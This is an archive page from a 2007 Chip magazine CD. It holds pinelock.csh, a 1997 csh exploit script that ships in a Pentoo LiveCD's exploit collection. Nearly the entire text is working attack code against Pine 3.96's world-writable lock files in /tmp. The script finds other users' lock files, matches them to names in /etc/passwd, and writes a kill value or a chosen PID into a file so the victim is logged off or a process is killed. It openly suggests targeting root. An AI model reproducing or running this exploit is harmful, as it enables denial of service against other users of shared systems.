Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / pine / pinelock.csh < prev

Wrap

Linux/UNIX/POSIX Shell Script | 2005-02-12 | 3.5 KB | 111 lines

#!/bin/csh -f #pinelock.csh #Written 12/97 by Iconoclast -> iconoclast@thepentagon.com #This program can exploit the vulnerabilities of pine lock files in version 3.96 #which are mode 666 to log a person off or kill one of their processes if a second #instance of pine is started. It only works if they open a second session of pine. #It could be useful if root likes to open up two sessions of pine... clear ls -la /tmp|egrep 'rw-rw-rw-.*\.[0-9a-f]+\.[0-9a-f]+$' > /tmp/aa #list of lock files in /tmp awk '{print $3}' /tmp/aa > /tmp/bb #get user name of each file awk '{print $9}' /tmp/aa > /tmp/dd #get list of names of lock files touch /tmp/cc /tmp/ee /tmp/gg #create files so we don't run into trouble #in the foreach loop when we do ">>" foreach i ( `cat /tmp/bb` ) grep $i /etc/passwd >> /tmp/cc #search /etc/passwd for user name end awk -F: '{print $5}' /tmp/cc > /tmp/ff #get person's name from user name set k=1 foreach i( `cat /tmp/dd` ) #go through lock file names echo $k >> /tmp/gg #generate sequential numbers set k = `expr $k + 1` #increment count by 1 cat /tmp/$i >> /tmp/ee #get pid within each lock file echo "" >> /tmp/ee #new line end paste -d " " /tmp/gg /tmp/dd /tmp/ee /tmp/bb /tmp/ff>/tmp/hh echo "The following users are running pine:" echo "" echo "#" lock file pid " " uid " " user name echo "--------------------------------------------------" cat /tmp/hh #this is the parsed data echo "" echo "Pick from the choices below." echo "1) Try to log them off" echo "2) Try to kill a process" echo "3) Exit" echo -n "Choice:" set input = $< if ("$input" == "3") then cd /tmp rm -f aa bb cc dd ee ff gg hh exit endif if ("$input" == "1"||"$input" == "2") then echo -n "Pick a number you'd like to try:" set number = $< set k=0 foreach i (`cat /tmp/dd`) set k = `expr $k + 1` if ("$k" == "$number") then set filename = $i goto label endif end endif label: if("$input" == "1") then echo 99999999999999999999999999999999 >! /tmp/$i #32 9's in lock file echo "Kill code has been inserted\!" endif if ("$input" == "2") then echo '' >! /tmp/$i #remove old pid echo "Below are the processes the person is running:" ls -la /tmp/$i > /tmp/ll awk '{print $3}' /tmp/ll > /tmp/mm #/tmp/mm has uid set uid = `cat /tmp/mm` /bin/ps -ef|grep $uid > /tmp/jj #number generator and paste. awk '{print $1}' /tmp/jj > /tmp/kk #amount of processes set k=1 rm -f /tmp/gg touch /tmp/gg foreach i( `cat /tmp/kk` ) echo $k >> /tmp/gg #generate sequential numbers set k = `expr $k + 1` #increment count by 1 end paste -d " " /tmp/gg /tmp/jj > /tmp/nn cat /tmp/nn echo -n "Pick a process:" #choose process we want to kill set number2 = $< awk '{print $3}' /tmp/nn > /tmp/oo #put pids into a file set k=0 foreach i( `cat /tmp/oo` ) #find pid we want set k = `expr $k + 1` if ("$k" == "$number2") then goto label2 endif end label2: echo $i >! /tmp/$filename #put pid into lockfile echo "Kill code has been inserted\!" endif cd /tmp rm -f aa bb cc dd ee ff gg hh jj kk ll mm nn oo #clean up files cd #put you back in home dir # www.hack.co.za [1999]#